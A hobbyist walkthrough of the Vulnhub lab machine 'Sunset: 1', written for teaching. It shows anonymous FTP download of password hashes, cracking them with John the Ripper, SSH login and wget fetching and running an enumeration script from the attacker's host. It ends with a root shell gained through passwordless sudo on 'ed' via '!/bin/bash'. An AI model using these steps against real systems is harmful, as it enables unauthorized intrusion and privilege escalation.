Sunset: 1 Walkthrough — Vulnhub
Sunset: ‘1’ is a final box in sunset series, the series where I enjoyed a lot. Before you go any further reading this walkthrough, this box is the easiest out of all three boxes in my personal opinion and I would highly recommend to try to pwn this box if you haven’t attempt to do it yet.
In that way, you’ll learn more :) — if you’re stuck at any point, don’t give up!
As always, let’s begin with nmap Automator:
./nmapAutomator.sh 10.0.2.8 All
Almost immediately, the scan has discovered two open ports which provides FTP and SSH service (port 21 and 22). Sometimes FTP service have an anonymous access enabled, so it’s worth a try to log into ftp service anonymously to see if an anonymous access is allowed:
Anonymous access is allowed! It seems to only have a file called “backup” in the service, so let’s try and download it on my machine:
ftp> get backup
local: backup remote: backup
200 Active data connection established.
125 Data connection already open. Transfer starting.
226 Transfer complete.
1062 bytes received in 0.00 secs (2.0754 MB/s)
ftp> exit
Let’s have a look on the file to see if we can find anything interesting or valuable.
vim backup
It looks like hashed credentials to each user on the machine! Let’s tidy it up first, then try and crack it with John The Ripper password cracker:
john backup
Boom! User sunset’s password was cracked into “cheer14” :D
Let’s try and login into ssh service with sunset’s credentials and it works!
Now we need to transfer Linux Smart Enumerator from my machine into the box and run it:
On Kali:
python -m SimpleHTTPServer 1234
On SSH:
wget http://10.0.2.4:1234/lse.sh
chmod +x lse.sh
./lse.sh
Linux Smart Enumerator has discovered a command line where we could use sudo without a password. In other words, we can run ‘ed’ as root.
Since ‘ed’ is a line-oriented text editor and when ‘ed’ is first invoked, it’ll be in command mode which allows us to execute specific command lines. Let’s try and run a bash shell within ed text editor:
As we can see above, I entered “!/bin/bash” which tells the text editor to run ‘/bin/bash’. And it works!
Completed it! Cheers whitecr0wz for creating an another fun box on vulnhub; even it is the easiest box out of three, I really did enjoy it.
In my personal opinion, I think sunset series is one of few series I would highly recommend for beginners. I would advise to start with Sunset: 1 box, then Dawn, and finally Nightfall. In that way the difficulty to pwn the box will increase as you progress while learning invaluable techniques and skills.
As I mentioned earlier on, if you struggle during an attempt to root a box, don’t give up! Otherwise, you’ll never know the feeling when you got a root shell after many hours, days or even weeks worth of effort!
As always, I’ll see you next week (>’-’)>
